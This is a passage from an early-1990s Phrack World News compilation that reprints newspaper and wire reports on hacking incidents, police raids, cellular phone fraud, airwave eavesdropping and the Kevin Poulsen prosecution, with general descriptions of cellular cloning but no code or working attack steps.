  4954. There were too many people congregating."
  4955.  
  4956. [NOTE: Newsbytes stands by its accurate reporting of Johnson's statements.  It
  4957. also affirms that the story by Meeks accurately reflects the material taped
  4958. during his interview]
  4959.  
  4960. In a related matter, Marc Rotenberg, director of the Washington office of
  4961. Computer Professionals For Social Responsibility (CPSR) has announced that CPSR
  4962. has filed a Freedom of Information Act (FOIA) request with the Secret Service
  4963. asking for information concerning Secret Service involvement in the incident.
  4964.  
  4965. Rotenberg told Newsbytes that the Secret Service has 10 days to respond to the
  4966. request.  He also said that CPSR "is exploring other legal options in this
  4967. matter."
  4968.  
  4969. The Secret Service, in earlier conversations with Newsbytes, has denied that
  4970. the mall security was working on its behalf.
  4971.  
  4972. In the incident itself, a group attending the informal meeting was disbanded
  4973. and, according to attendees, had property confiscated.  They also contend that
  4974. security guards took film from someone photographing the confiscation as well
  4975. as a list that someone was making of the guard's names.  In his November 9th
  4976. conversation with Newsbytes, Johnson denied that security personnel took away
  4977. any film or lists and further said "We did not confiscate any material.  The
  4978. group refused to own up to who owned material on the tables and in the vicinity
  4979. so we collected it as lost material.  If it turns out that anything did belong
  4980. to any of those people, they are welcome to come in and, after making proper
  4981. identification, take the material."
  4982.  
  4983. 2600 meetings are promoted by 2600 Magazine: The Hacker Quarterly and are held
  4984. on the evening of the first Friday of each month in public places and malls in
  4985. New York City, Washington, Philadelphia, Cambridge, St. Louis, Chicago, Los
  4986. Angeles and San Francisco.  They are regularly attended by a variety of persons
  4987. interested in telecommunications and so-called "hacker issues".
  4988. _______________________________________________________________________________
  4989.  
  4990.  Secret Service Grabs Computers In College Raid               December 17, 1992
  4991.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4992.  by Joe Abernathy (The Houston Chronicle)(Page A37)
  4993.  
  4994. The Secret Service has raided a dorm room at Texas Tech University, seizing the
  4995. computers of two Houston-area students who allegedly used an international
  4996. computer network to steal computer software.
  4997.  
  4998. Agents refused to release the names of the two area men and a third man, a
  4999. former Tech student from Austin, who were not arrested in the late-morning raid
  5000. Monday at the university in Lubbock.  Their cases will be presented to a grand
  5001. jury in January.
  5002.  
  5003. The three, in their early 20s, are expected to be charged with computer crime,
  5004. interstate transport of stolen property and copyright infringements.
  5005.  
  5006. "The university detected it," said Agent R. David Freriks of the Secret Service
  5007. office in Dallas, which handled the case.  He said Texas Tech computer system
  5008. operators noticed personal credit information mixed in with the software
  5009. mysteriously filling up their data storage devices.
  5010.  
  5011. The former student admitted pirating at least $6,000 worth of games and
  5012. programs this summer, Freriks said.
  5013.  
  5014. The raid is the first to fall under a much broader felony definition of
  5015. computer software piracy that could affect many Americans.
  5016.  
  5017. Agents allege the three used the Internet computer network, which connects up
  5018. to 15 million people in more than 40 nations, to make contacts with whom they
  5019. could trade pirated software.  The software was transferred over the network,
  5020. into Texas Tech's computers and eventually into their personal computers.
  5021.  
  5022. The Software Publishers Association, a software industry group chartered to
  5023. fight piracy, contends the industry lost $1.2 billion in sales in 1991 to
  5024. pirates.
  5025.  
  5026. Although these figures are widely questioned for their accuracy, piracy is
  5027. widespread among Houston's 450-plus computer bulletin boards, and even more so
  5028. on the global Internet.
  5029.  
  5030. "There are a lot of underground sites on the Internet run by university system
  5031. administrators, and they have tons of pirated software available to download --
  5032. gigabytes of software," said Scott Chasin, a former computer hacker who is now
  5033. a computer security consultant.
  5034.  
  5035. Freriks said the investigation falls under a revision of the copyright laws
  5036. that allows felony charges to be brought against anyone who trades more than 10
  5037. pieces of copyrighted software -- a threshold that would cover many millions of
  5038. Americans who may trade copies of computer programs with their friends.
  5039.  
  5040. "The ink is barely dry on the amendment, and you've already got law enforcement
  5041. in there, guns blazing, because somebody's got a dozen copies of stolen
  5042. software," said Marc Rotenberg, director of Computer Professionals for Social
  5043. Responsibility, in Washington.
  5044.  
  5045. "That was a bad provision when it was passed, and was considered bad for
  5046. precisely this reason, giving a justification for over-reaching by law
  5047. enforcement."
  5048.  
  5049. Freriks said the raid also involved one of the first uses of an expanded right
  5050. to confiscate  computers  used in crime.
  5051.  
  5052. "Our biggest complaint has been that you catch 'em and slap 'em on the wrist,
  5053. and then give the smoking gun back," he said.
  5054.  
  5055. "So they've changed the law so that we now have forfeiture authority."
  5056.  
  5057. The Secret Service already has been under fire for what is seen by civil
  5058. libertarians as an overly casual use of such authority, which many believe has
  5059. mutated from an investigative tool into a de facto punishment without adequate
  5060. court supervision.
  5061.  
  5062. _______________________________________________________________________________
  5063.  
  5064.  Hacker Taps Into Freeway Call Box -- 11,733 Times             October 23, 1992
  5065.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  5066.  by Jeffrey A. Perlman (Los Angeles Times)(Page A3)
  5067.  
  5068. SANTA ANA, CA -- An enterprising hacker reached out and touched someone 11,733
  5069. times in August -- from a freeway emergency call box in Orange County.
  5070.  
  5071. A computer that monitors the county's emergency call boxes attributed 25,875
  5072. minutes of calls to the mysterious caller who telephoned people in countries
  5073. across the globe, according to a staff report prepared for the Orange County
  5074. Transportation Authority.
  5075.  
  5076. "This is well over the average of roughly 10 calls per call box," the report
  5077. noted.
  5078.  
  5079. About 1,150 bright yellow call boxes have been placed along Orange County's
  5080. freeways to connect stranded motorists to the California Highway Patrol.  But
  5081. the caller charged all his calls to a single box on the shoulder of the Orange
  5082. (57) Freeway.
  5083.  
  5084. The hacker apparently matched the individual electronic serial number for the
  5085. call box to its telephone number.  It took an investigation by the transit
  5086. authority, and three cellular communications firms to unravel the mystery, the
  5087. report stated.
  5088.  
  5089. Officials with the transit authority's emergency call box program were not
  5090. available to comment on the cost of the phone calls or to say how they would be
  5091. paid.
  5092.  
  5093. But the report assured that "action has been taken to correct this problem.  It
  5094. should be noted that this is the first incident of this type in the five-year
  5095. history of the program."
  5096.  
  5097. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  5098.  
  5099.  Ring May Be Responsible For Freeway Call Box Scam             October 24, 1992
  5100.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  5101.  by Jodi Wilgoren (Los Angeles Times)(Page B4)
  5102.  
  5103.             "Officials Believe A Hacker Sold Information to Others;
  5104.                   LA Cellular Will Pay For The Excess Calls."
  5105.  
  5106. COSTA MESA, CA -- As soon as he saw the August bill for Orange County's freeway
  5107. call boxes, analyst Dana McClure guessed something was awry.
  5108.  
  5109. There are typically about 12,000 calls a month from the 1,150 yellow boxes that
  5110. dot the county's freeways.  But in August, there were nearly that many
  5111. registered to a single box on the Orange Freeway a half-mile north of Lambert
  5112. Road in Brea.
  5113.  
  5114. "This one stood out, like 'Whoa!'" said McClure, who analyzes the monthly
  5115. computer billing tapes for the Orange County Transportation Authority.  "It
  5116. kicked out as an error because the number of minutes was so far over what it is
  5117. supposed to be."
  5118.  
  5119. With help from experts at LA Cellular, which provides the telephone service for
  5120. the boxes, and GTE Cellular, which maintains the phones, McClure and OCTA
  5121. officials determined that the calls -- 11,733 of them totaling 25,875 minutes
  5122. for a charge of about $1,600 -- were made because the hacker learned the code
  5123. and telephone number for the call boxes.
  5124.  
  5125. Because of the number of calls in just one month's time, officials believe
  5126. there are many culprits, perhaps a ring of people who bought the numbers from
  5127. the person who cracked the system.
  5128.  
  5129. You'd have to talk day and night for 17 or 18 days to do that; it'd be
  5130. fantastic to be able to make that many calls," said Lee Johnson of GTE
  5131. Cellular.
  5132.  
  5133. As with all cases in which customers prove they did not make the calls on their
  5134. bills, LA Cellular will pick up the tab, company spokeswoman Gail Pomerantz
  5135. said.  Despite the amount of time involved, the bill was only $1,600, according
  5136. to OCTA spokeswoman Elaine Beno, because the county gets a special emergency
  5137. service rate for the call box lines.
  5138.  
  5139. The OCTA will not spend time and money investigating who made the calls;
  5140. however, it has adjusted the system to prevent further fraud.  Jim Goode of LA
  5141. Cellular said such abuses are rare among cellular subscribers, and that such
  5142. have never before been tracked to freeway call boxes.
  5143.  
  5144. The call boxes contain solar cellular phones programmed to dial directly to the
  5145. California Highway Patrol or a to a GTE Cellular maintenance line.  The calls
  5146. on the August bill included 800 numbers and 411 information calls and hundreds
  5147. of calls to financial firms in New York, Chicago and Los Angeles.  That calls
  5148. were placed to these outside lines indicates that the intruders made the
  5149. connections from another cellular phone rather than from the call box itself.
  5150. Each cellular phone is assigned a seven-digit Mobile Identification Number that
  5151. functions like a phone number, and a 10- or 11-digit Electronic Service Number
  5152. unique to that particular phone (similar to the vehicle identification number
  5153. assigned every automobile).  By reprogramming another cellular phone with the
  5154. MIN and ESN of the call box phone, a hacker could charge all sorts of calls to
  5155. the OCTA.
  5156.  
  5157. "That's not legally allowable, and it's not an easy thing to do," McClure said,
  5158. explaining that the numbers are kept secret and that reprogramming a cellular
  5159. phone could wreck it.  "Most people don't know how to do that, but there are
  5160. some."
  5161.  
  5162. Everyone involved with the call box system is confident that the problem has
  5163. been solved, but officials are mum as to how they blocked potential cellular
  5164. banditry.
  5165.  
  5166. "I don't think we can tell you what we did to fix it because we don't want it
  5167. to happen again," Beno said with a laugh.
  5168. _______________________________________________________________________________
  5169.  
  5170.  FBI Probes Possible Boeing Computer Hacker                    November 6, 1992
  5171.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  5172.  Taken from Reuters
  5173.  
  5174. SEATTLE -- Federal authorities said Friday they were investigating the
  5175. possibility that a hacker had breached security and invaded a Unix-based
  5176. computer system at the aerospace giant Boeing Co.
  5177.  
  5178. The Federal Bureau of Investigation confirmed the probe after a Seattle radio
  5179. station reported it received a facsimile of a Boeing memorandum warning
  5180. employees the security of one of its computer networks may have been violated.
  5181.  
  5182. The memo, which had been sent from inside Boeing, said passwords may have been
  5183. compromised, a reporter for the KIRO station told Reuters.
  5184.  
  5185. KIRO declined to release a copy of the memorandum or to further identify its
  5186. source.
  5187.  
  5188. The memorandum said the problem involved computers using Unix, the open-ended
  5189. operating system used often in engineering work.
  5190.  
  5191. Sherry Nebel, a spokeswoman at Boeing's corporate headquarters, declined
  5192. comment on the memorandum or the alleged breach of security and referred all
  5193. calls to the FBI.
  5194.  
  5195. An FBI spokesman said the agency was in touch with the company and would
  5196. discuss with it possible breaches of federal law.
  5197.  
  5198. No information was immediately available on what type of computer systems may
  5199. have been violated at Boeing, the world's largest commercial aircraft
  5200. manufacturer.
  5201.  
  5202. The company, in addition, acts as a defense contractor and its business
  5203. includes work on the B-2 stealth bomber, NASA's space station and the "Star
  5204. Wars" project.
  5205.  
  5206. Boeing is a major user of computer technology and runs a computer services
  5207. group valued at $1 billion.
  5208.  
  5209. Much of the company's engineering work is conducted using computer -aided
  5210. design (CAD) capabilities.  Boeing currently is pioneering a computerized
  5211. technique which uses 2,000 computer terminals to design its new 777 twinjet.
  5212.  
  5213. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  5214.  
  5215.  FBI Expands Boeing Computer Hacker Probe                      November 9, 1992
  5216.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  5217.  by Samuel Perry (Reuters)
  5218.  
  5219. SEATTLE -- Federal authorities expanded their investigation of a computer
  5220. hacker or hackers suspected of having invaded a computer system at aerospace
  5221. giant and defense contractor Boeing Co.
  5222.  
  5223. FBI spokesman Dave Hill said the investigation was expanded after the agency
  5224. discovered similar infiltrations of computer records belonging to the U.S.
  5225. District Court in Seattle and another government agency.
  5226.  
  5227. "We're trying to determine if the same individuals are involved here," he said,
  5228. adding more than one suspect may be involved and the purpose of the intrusion
  5229. was unclear.
  5230.  
  5231. "We don't think this was an espionage case," Hill said, adding federal agents
  5232. were looking into violations of U.S. law barring breaking into a computer of
  5233. federal interest, but that no government classified data was believed to be
  5234. compromised.
  5235.  
  5236. "I'm not sure what their motivation is," he told Reuters.
  5237.  
  5238. The FBI confirmed the investigation after a Seattle radio station reported it
  5239. received a facsimile of a Boeing memorandum warning employees that the security
  5240. of one of its computer networks may have been violated.
  5241.  
  5242. A news reporter at KIRO Radio, which declined to release the facsimile, said
  5243. it was sent by someone within Boeing and that it said many passwords may have
  5244. been compromised.
  5245.  
  5246. Boeing's corporate headquarters has declined to comment on the matter,
  5247. referring all calls to the FBI.
  5248.  
  5249. The huge aerospace company, which is the world's largest maker of commercial
  5250. jetliners, relies heavily on computer processing to design and manufacture its
  5251. products. Its data processing arm operates $1.6 billion of computer equipment.
  5252.  
  5253. No information was disclosed on what system at Boeing had been compromised.
  5254. But one computer industry official said it could include "applications
  5255. involving some competitive situations in the aerospace industry.
  5256.  
  5257. The company is a defense contractor or subcontractor on major U.S. military
  5258. programs, such as the B-2 stealth bomber, the advanced tactical fighter,
  5259. helicopters, the NASA space station and the "Star Wars" missile defense system.
  5260.  
  5261. Recently, Boeing has pioneered the unprecedented use of computer-aided design
  5262. capabilities in engineering its new 777 twinjet. The design of the 777 is now
  5263. mostly complete as Boeing prepares for final assembly beginning next year.
  5264.  
  5265. That system, which uses three-dimensional graphics to replace a draftsman's
  5266. pencil and paper, includes 2,000 terminals that can tap into data from around
  5267. the world.
  5268. _______________________________________________________________________________
  5269.  
  5270.  Hacker Breaches NOAA Net                                        August 3, 1992
  5271.  ~~~~~~~~~~~~~~~~~~~~~~~~
  5272.  by Kevin Power (Government Computer News)(Page 10)
  5273.  
  5274. As a recent breach of the National Oceanic and Atmospheric Administration's
  5275. (NOAA) link to the Internet shows, the network not only benefits scientists but
  5276. also attracts unwanted attention from hackers.
  5277.  
  5278. NOAA officials said an intruder in May accessed the agency's TCP/IP network,
  5279. seeking to obtain access to the Internet.  The breach occurred on the National
  5280. Weather Service headquarters' dial-in communications server in Silver Spring,
  5281. Maryland, said Harold Whitt, a senior telecommunications engineer with NOAA.
  5282.  
  5283. Cygnus Support, a Palo Alto, California, software company, alerted NOAA
  5284. officials to the local area network security breach when Cygnus found that an
  5285. outsider had accessed one of its servers from the NOAA modem pool and had
  5286. attempted several  long-distance phone calls.
  5287.  
  5288. NOAA and Cygnus officials concluded that the perpetrator was searching for an
  5289. Internet host, possibly to locate a games publisher, Whitt said.  Fortunately,
  5290. the hacker did no damage to NOAA's data files, he said.
  5291.  
  5292. Whitt said intruders using a modem pool to tap into external networks are
  5293. always a security concern.  But organizations with Internet access seem to be
  5294. hacker favorites, he said.  "There's a lot of need for Internet security,"
  5295. Whitt said.
  5296.  
  5297. "You have to make sure you monitor the usage of the TCP/IP network and the
  5298. administration of the local host.  It's a common problem, but in our case we're
  5299. more vulnerable because of tremendous Internet access," Whitt said.
  5300.  
  5301. Whitt said NOAA's first response was to terminate all dial-in services
  5302. temporarily and change all the numbers.
  5303.  
  5304. Whitt said he also considered installing a caller-identification device for the
  5305. new lines.  But the phone companies have limited capabilities to investigate
  5306. random incidents, he said.
  5307.  
  5308. "It's very difficult to isolate problems at the protocol level," Whitt said.
  5309. "We targeted the calls geographically to the Midwest.
  5310.  
  5311. "But once you get into the Internet and have an understanding of TCP/IP, you
  5312. can just about go anywhere," Whitt said.
  5313.  
  5314. NOAA, a Commerce Department agency, has since instituted stronger password
  5315. controls and installed a commercial dial-back security system, Defender from
  5316. Digital Pathways Inc. of Mountain View, California.
  5317.  
  5318. Whitt said the new system requires users to undergo password validation at dial
  5319. time and calls back users to synchronize modems and log calls.  Despite these
  5320. corrective measures, Reed Phillips, Commerce's IRM director, said the NOAA
  5321. incident underlies the axiom that networks always should be considered
  5322. insecure.
  5323.  
  5324. At the recent annual conference of the Federation of Government Information
  5325. Processing Councils in New Orleans, Phillips said the government is struggling
  5326. to transmit more information electronically and still maintain control over the
  5327. data.
  5328.  
  5329. Phillips said agencies are plagued by user complacency, a lack of
  5330. organizational control, viruses, LAN failures and increasing demands for
  5331. electronic commerce. "I'm amazed that there are managers who believe their
  5332. electronic-mail systems are secure," Phillps said.  "We provide a great deal of
  5333. security, but it can be interrupted.
  5334.  
  5335. "Security always gets hits hard in the budget.  But the good news is vendors
  5336. recognize our needs and are coming out with cheaper security tools," Phillips
  5337. said.
  5338.  
  5339. Phillips said the NOAA attack shows that agencies must safeguard a network's
  5340. physical points because LANs present more security problems than centralized
  5341. systems.
  5342.  
  5343. "The perpetrator can dial in via a modem using the common services provided by
  5344. the telephone company, and the perpetrator risks no personal physical harm.  By
  5345. gaining access to a single system on the network the perpetrator is then able
  5346. to propagate his access rights to multiple systems on the network," Phillips
  5347. said.
  5348.  
  5349. "In many LAN environments a user need only log on the network once and all
  5350. subsequent access is assumed to be authorized for the entire LAN.  It then
  5351. becomes virtually impossible for a network manager or security manager to track
  5352. events of a perpetrator," he said.
  5353. _______________________________________________________________________________
  5354.  
  5355.  Hackers Scan Airwaves For Conversations                        August 17, 1992
  5356.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  5357.  by Mark Lewyn (The Washington Post)(Page A1)
  5358.  
  5359.                     "Eavesdroppers Tap Into Private Calls."
  5360.  
  5361. On the first day of the Soviet coup against Mikhail Gorbachev in August 1991,
  5362. Vice President Quayle placed a call to Senator John C. Danforth (R-Mo.) and
  5363. assessed the tense, unfolding drama.
  5364.  
  5365. It turned out not to be a private conversation.
  5366.  
  5367. At the time, Quayle was aboard a government jet, flying to Washington from
  5368. California.  As he passed over Amarillo, Texas his conversation, transmitted
  5369. from the plane to Danforth's phone, was picked up by an eavesdropper using
  5370. electronic "scanning" gear that searches the airwaves for radio or wireless
  5371. telephone transmissions and then locks onto them.
  5372.  
  5373. The conversation contained no state secrets -- the vice president observed that
  5374. Gorbachev was all but irrelevant and Boris Yeltsin had become the man to watch.
  5375. But it remains a prized catch among the many conversations overhead over many
  5376. years by one of a steadily growing fraternity of amateur electronics
  5377. eavesdroppers who listen in on all sorts of over-the-air transmissions, ranging
  5378. from Air Force One communications to cordless car-phone talk.
  5379.  
  5380. One such snoop overheard a March 1990 call placed by Peter Lynch, a well-known
  5381. mutual fund executive in Boston, discussing his forthcoming resignation, an
  5382. event that later startled financial circles.  Another electronic listener
  5383. overheard the chairman of Popeye's Fried Chicken disclose plans for a 1988
  5384. takeover bid for rival Church's Fried Chicken.
  5385.  
  5386. Calls by President Bush and a number of Cabinet officers have been intercepted.
  5387. The recordings of car-phone calls made by Virginia Governor L. Douglas Wilder
  5388. (D), intercepted by a Virginia Beach restaurant owner and shared with Senator
  5389. Charles S. Robb (D-Va.), became a cause ce'le'bre in Virginia politics.
  5390.  
  5391. Any uncoded call that travels via airwaves, rather than wire, can be picked up,
  5392. thus the possibilities have multiplied steadily with the growth of cellular
  5393. phones in cars and cordless phones in homes and offices.  About 41 percent of
  5394. U.S. households have cordless phones and the number is expected to grow by
  5395. nearly 16 million this year, according to the Washington-based Electronics
  5396. Industry Association.
  5397.  
  5398. There are 7.5 million cellular phone subscribers, a technology that passes
  5399. phone calls over the air through a city from one transmission "cell" to the
  5400. next. About 1,500 commercial airliners now have air-to-ground phones -- roughly
  5401. half the U.S. fleet.
  5402.  
  5403. So fast-growing is this new form of electronic hacking that it has its own
  5404. magazines, such as Monitoring Times.  "The bulk of the people doing this aren't
  5405. doing it maliciously," said the magazine's editor, Robert Grove, who said he
  5406. has been questioned several times by federal agents, curious about hackers'
  5407. monitoring activities.
  5408.  
  5409. But some experts fear the potential for mischief.  The threat to business from
  5410. electronic eavesdropping is "substantial," said Thomas S. Birney III, president
  5411. of Cellular Security Group, a Massachusetts-based consulting group.
  5412.  
  5413. Air Force One and other military and government aircraft have secure satellite
  5414. phone links for sensitive conversations with the ground, but because these are
  5415. expensive to use and sometimes not operating, some calls travel over open
  5416. frequencies.  Specific frequencies, such as those used by the president's
  5417. plane, are publicly available and are often listed in "scanners" publications
  5418. and computer bulletin boards.
  5419.  
  5420. Bush, for example, was accidentally overheard by a newspaper reporter in 1990
  5421. while talking about the buildup prior to the Persian Gulf War with Senator
  5422. Robert Byrd (D-W.Va.).  The reporter, from the Daily Times in Gloucester,
  5423. Massachusetts quickly began taking notes and the next day, quoted Bush in his
  5424. story under the headline, "Bush Graces City Airspace."
  5425.  
  5426. The vice president's chief of staff, William Kristol, was overheard castigating
  5427. one staff aide as a "jerk" for trying to reach him at home.
  5428.  
  5429. Some eavesdroppers may be stepping over the legal line, particularly if they
  5430. tape record such conversations.
  5431.  
  5432. The Electronic Communications Privacy Act prohibits intentional monitoring,
  5433. taping or distribution of the content of most electronic, wire or private oral
  5434. communications.  Cellular phone calls are explicitly protected under this act.
  5435. Local laws often also prohibit such activity.  However, some lawyers said that
  5436. under federal law, it is legal to intercept cordless telephone conversations as
  5437. well as conversations on an open radio channel.
  5438.  
  5439. The government rarely prosecutes such cases because such eavesdroppers are
  5440. difficult to catch.  Not only that, it is hard to win convictions against
  5441. "listening Toms," lawyers said, because prosecutors must prove the
  5442. eavesdropping was intentional.
  5443.  
  5444. "Unless they prove intent they are not going to win," said Frank Terranella,
  5445. general counsel for the Association of North American Radio Clubs in Clifton,
  5446. New Jersey.  "It's a very tough prosecution for them."
  5447.  
  5448. To help curb eavesdropping, the House has passed a measure sponsored by Rep.
  5449. Edward J. Markey (D-Mass.), chairman of the House telecommunications and
  5450. finance subcommittee, that would require the Federal Communications Commission
  5451. to outlaw any scanner that could receive cellular frequencies.  The bill has
  5452. been sent to the Senate.
  5453.  
  5454. But there are about 10 million scanners in use, industry experts report, and
  5455. this year sales of scanners and related equipment such as antennas will top
  5456. $100 million.
  5457.  
  5458. Dedicated scanners, who collect the phone calls of high-ranking government
  5459. officials the way kids collect baseball cards, assemble basements full of
  5460. electronic gear.
  5461.  
  5462. In one sense, the electronic eavesdroppers are advanced versions of the
  5463. ambulance chasers who monitor police and fire calls with simpler scanning
  5464. equipment and then race to the scene of blazes and accidents for a close look.
  5465. But they also have kinship with the computer hackers who toil at breaking into
  5466. complex computer systems and rummaging around other's files and software
  5467. programs.
  5468.  
  5469. One New England eavesdropper has four scanners, each one connected to its own
  5470. computer, with a variety of frequencies programmed.  When a conversation
  5471. appears on a pre-selected frequency, a computer automatically locks in on the
  5472. frequency to capture it.  He also keeps a scanner in his car, for entertainment
  5473. along the road.
  5474.  
  5475. He justifies his avocation with a seemingly tortured logic.  "I'm not going out
  5476. and stealing these signals," he said.  "They're coming into my home, right
  5477. through my windows."
  5478. _______________________________________________________________________________
  5479.  
  5480.  Why Cybercrooks Love Cellular                                December 21, 1989
  5481.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  5482.  by William G. Flanagan and Brigid McMenamin (Forbes)(Page 189)
  5483.  
  5484. Cellular phones provide cybercrooks with golden opportunities for telephone
  5485. toll fraud, as many shocked cellular customers are discovering.  For example,
  5486. one US West Cellular customer in Albuquerque recently received a hefty
  5487. telephone bill.
  5488.  
  5489. Total: $20,000.
  5490.  
  5491. Customers are not held responsible when their phone numbers are ripped off and
  5492. misused.  But you may be forced to have your cellular phone number changed.
  5493. The cellular carriers are the big losers -- to the tune of an estimated $300
  5494. million per year in unauthorized calls.
  5495.  
  5496. How do the crooks get the numbers?  There are two common methods: cloning and
  5497. tumbling.
  5498.  
  5499. Each cellular phone has two numbers -- a mobile identification number (MIN) and
  5500. an electronic serial number (ESN).  Every time you make a call, the chip
  5501. transmits both numbers to the local switching office for verification and
  5502. billing.
  5503.  
  5504. Cloning involves altering the microchip in another cellular phone so that both
  5505. the MIN and ESN numbers match those stolen from a bona fide customer.  The
  5506. altering can be done with a personal computer. The MIN and ESN numbers are
  5507. either purchased from insiders or plucked from the airwaves with a legal
  5508. device, about the size of a textbook, that can be plugged into a vehicle's
  5509. cigarette lighter receptacle.
  5510.  
  5511. Cellular companies are starting to watch for suspicious calling patterns.  But
  5512. the cloning may not be detected until the customer gets his bill.
  5513.  
  5514. The second method -- tumbling -- also involves using a personal computer to
  5515. alter a microchip in a cellular phone so that its numbers change after every
  5516. phone call.  Tumbling doesn't require any signal plucking.  It takes advantage
  5517. of the fact that cellular companies allow "roaming" -- letting you make calls
  5518. away from your home area.
  5519.  
  5520. When you use a cellular phone far from your home base, it may take too long for
  5521. the local switching office to verify your MIN and ESN numbers.  So the first
  5522. call usually goes through while the verification goes on.  If the numbers are
  5523. invalid, no more calls will be permitted by that office on that phone.
  5524.  
  5525. In 1987 a California hacker figured out how to use his personal computer to
  5526. reprogram the chip in a cellular phone.  Authorities say one of his pals
  5527. started selling altered chips and chipped-up phones.  Other hackers figured out
  5528. how to make the chips generate new, fake ESN numbers every time the cellular
  5529. phone was used, thereby short-circuiting the verification process.  By 1991
  5530. chipped-up, tumbling ESN phones were in use all over the U.S.
  5531.  
  5532. The cellular carriers hope to scotch the problem of tumbling with instant
  5533. verification.  But that won't stop the clones.
  5534.  
  5535. How do crooks cash in?  Drug dealers buy (for up to $ 3,200) or lease (about
  5536. $750 per day) cellular phones with altered chips.  So do the "call-sell"
  5537. crooks, who retail long distance calls to immigrants often for less than phone
  5538. companies charge.  That's why a victim will get bills for calls all over the
  5539. world, but especially to Colombia, Bolivia and other drug-exporting countries.
  5540. _______________________________________________________________________________
  5541.  
  5542.                                 ==Phrack Inc.==
  5543.  
  5544.                   Volume Four, Issue Forty-One, File 12 of 13
  5545.  
  5546.               PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  5547.               PWN                                             PWN
  5548.               PWN              Phrack World News              PWN
  5549.               PWN                                             PWN
  5550.               PWN           Issue 41 / Part 2 of 3            PWN
  5551.               PWN                                             PWN
  5552.               PWN        Compiled by Datastream Cowboy        PWN
  5553.               PWN                                             PWN
  5554.               PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  5555.  
  5556.  
  5557.  Government Cracks Down On Hacker                              November 2, 1992
  5558.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  5559.  by Donald Clark (The San Francisco Chronicle)(Page C1)
  5560.  
  5561.          "Civil Libertarians Take Keen Interest In Kevin Poulsen Case"
  5562.  
  5563. Breaking new ground in the war on computer crime, the Justice Department plans
  5564. to accuse Silicon Valley's most notorious hacker of espionage.
  5565.  
  5566. Kevin Lee Poulsen, 27, touched off a 17-month manhunt before being arrested on
  5567. charges of telecommunications and computer fraud in April 1991.  A federal
  5568. grand jury soon will be asked to issue a new indictment charging Poulsen with
  5569. violating a law against willfully sharing classified information with
  5570. unauthorized persons, assistant U.S. attorney Robert Crowe confirmed.
  5571.  
  5572. A 1988 search of Poulsen's Menlo Park storage locker uncovered a set of secret
  5573. orders from a military exercise, plus evidence that Poulsen may have tried to
  5574. log onto an Army data network and eavesdropped on a confidential investigation
  5575. of former Philippine President Ferdinand Marcos.  It is not clear whether the
  5576. new charge stems from these or other acts.
  5577.  
  5578. Poulsen did not hand secrets to a foreign power, a more serious crime, Crowe
  5579. noted.  But by using an espionage statute against a U.S. hacker for the first
  5580. time, prosecutors raise the odds of a record jail sentence that could be used
  5581. to deter other electronic break-ins.
  5582.  
  5583. They could use a stronger deterrent.  Using personal computers connected to
  5584. telephone lines, cadres of so-called cyberpunks have made a sport of tapping
  5585. into confidential databases and voicemail systems at government agencies and
  5586. corporations.  Though there is no reliable way to tally the damage, a 1989
  5587. survey indicated that computer crimes may cost U.S. business $500 million a
  5588. year, according to the Santa Cruz-based National Center for Computer Crime
  5589. Data.
  5590.  
  5591. Telephone companies, whose computers and switching systems have long been among
  5592. hackers' most inviting targets, are among those most anxious to tighten
  5593. security.  Poulsen allegedly roamed at will through the networks of Pacific
  5594. Bell, for example, changing records and even intercepting calls between Pac
  5595. Bell security personnel who were on his trail.
  5596.  
  5597. The San Francisco-based utility has been intimately involved in his
  5598. prosecution; Poulsen was actually captured in part because one of the company's
  5599. investigators staked out a suburban Los Angeles supermarket where the fugitive
  5600. shopped.
  5601.  
  5602. "Virtually everything we do these days is done in a computer --your credit
  5603. cards, your phone bills," said Kurt von Brauch, a Pac Bell security officer who
  5604. tracked Poulsen, in an interview last year. "He had the knowledge to go in
  5605. there and alter them."
  5606.  
  5607.  
  5608. BROAD LEGAL IMPACT
  5609.  
  5610. Poulsen's case could have broad impact because of several controversial legal
  5611. issues involved.  Some civil libertarians, for example, question the Justice
  5612. Department's use of the espionage statute, which carries a maximum 10-year
  5613. penalty and is treated severely under federal sentencing guidelines.  They
  5614. doubt the law matches the actions of Poulsen, who seems to have been motivated
  5615. more by curiosity than any desire to hurt national security.
  5616.  
  5617. "Everything we know about this guy is that he was hacking around systems for
  5618. his own purposes," said Mike Godwin, staff counsel for the Electronic Frontier
  5619. Foundation, a public-interest group that has tracked Poulsen's prosecution.  He
  5620. termed the attempt to use the statute against Poulsen "brain-damaged."
  5621.  
  5622. Poulsen, now in federal prison in Pleasanton, has already served 18 months in
  5623. jail without being tried for a crime, much less convicted.  Though federal
  5624. rules are supposed to ensure a speedy trial, federal judges can grant extended
  5625. time to allow pretrial preparation in cases of complex evidence or novel legal
  5626. issues.
  5627.  
  5628. Both are involved here.  After he fled to Los Angeles to avoid prosecution,
  5629. for example, Poulsen used a special scrambling scheme on one computer to make
  5630. his data files unintelligible to others.  It has taken months to decode that
  5631. data, and the job isn't done yet, Crowe said.  That PC was only found because
  5632. authorities intercepted one of Poulsen's phone conversations from jail, other
  5633. sources said.
  5634.  
  5635.  
  5636. CHARGES LABELED ABSURD
  5637.  
  5638. Poulsen declined requests for interviews.  His attorney, Paul Meltzer, terms
  5639. the espionage charge absurd.  He is also mounting several unusual attacks on
  5640. parts of the government's original indictment against Poulsen, filed in 1989.
  5641.  
  5642. He complains, for example, that the entire defense team is being subjected to
  5643. 15-year background checks to obtain security clearances before key documents
  5644. can be examined.
  5645.  
  5646. "The legal issues are fascinating," Meltzer said. "The court will be forced to
  5647. make law."
  5648.  
  5649. Poulsen's enthusiasm for exploring forbidden computer systems became known to
